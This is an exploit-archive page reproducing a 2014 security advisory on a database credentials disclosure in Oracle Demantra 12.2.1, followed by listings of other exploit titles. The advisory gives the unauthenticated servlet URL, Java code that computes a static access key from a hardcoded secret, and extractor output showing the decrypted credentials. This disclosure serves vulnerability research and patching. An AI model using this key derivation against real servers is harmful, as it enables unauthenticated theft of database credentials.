Menu

Search for hundreds of thousands of exploits

"Oracle Demantra 12.2.1 - Database Credentials Disclosure"

Author

Exploit author

Portcullis

Platform

Exploit platform

windows

Release date

Exploit published date

2014-03-01

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Details:

Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:

A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:

The target URL is:

http://target.com:8080/demantra/ServerDetailsServlet?UAK=

Now the UAK key is calculated statically:

  String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));

      StringBuffer tmp = new StringBuffer("sge");
      tmp.append(0);
      tmp.append(encryptedPassword);

      uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));

From that information it is possible to create a simple extractor:

pixel:demantra user$ java getUAK
-=[Oracle Demantra Database Details Retriever ]=-

[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
[+] Retrieved the following encrypted string:
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
[+] Decrypted string is:
TEST?test?demantra?orc?1

Together with the authentication bypass this can be exploited unauthenticated as well.

Copyright:

Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the users risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2016-02-03 "Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting" webapps hardware Portcullis
2015-09-25 "X2Engine 4.2 - Cross-Site Request Forgery" webapps php Portcullis
2015-09-25 "X2Engine 4.2 - Arbitrary File Upload" webapps php Portcullis
2015-07-14 "Pimcore CMS Build 3450 - Directory Traversal" webapps xml Portcullis
2015-04-21 "BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion" webapps cfm Portcullis
2014-12-10 "OpenEMR 4.1.2(7) - Multiple SQL Injections" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.4.99.5 - Remote Command Execution" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.4.99.5 - Blind SQL Injection" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.2 - XML External Entity File Disclosure" webapps php Portcullis
2014-10-02 "PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution" webapps php Portcullis
2014-10-02 "TestLink 1.9.11 - Multiple SQL Injections" webapps php Portcullis
2014-06-12 "IBM AIX 6.1.8 - 'libodm' Arbitrary File Write" local aix Portcullis
2014-05-14 "Broadcom PIPA C211 - Sensitive Information Disclosure" webapps hardware Portcullis
2014-04-24 "dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read" webapps php Portcullis
2014-03-12 "Procentia IntelliPen 1.1.12.1520 - 'data.aspx' Blind SQL Injection" webapps asp Portcullis
2014-03-12 "vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion" webapps php Portcullis
2014-03-10 "ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution" webapps multiple Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - SQL Injection" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Persistent Cross-Site Scripting" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Arbitrary File Disclosure" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Database Credentials Disclosure" webapps windows Portcullis
2008-05-11 "ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection" webapps php Portcullis
2008-05-08 "SAP Internet Transaction Server 6200.1017.50954.0 Bu (WGate) - 'wgate.dll?~service' Cross-Site Scripting" webapps cgi Portcullis
2008-05-08 "SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting" webapps cgi Portcullis 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected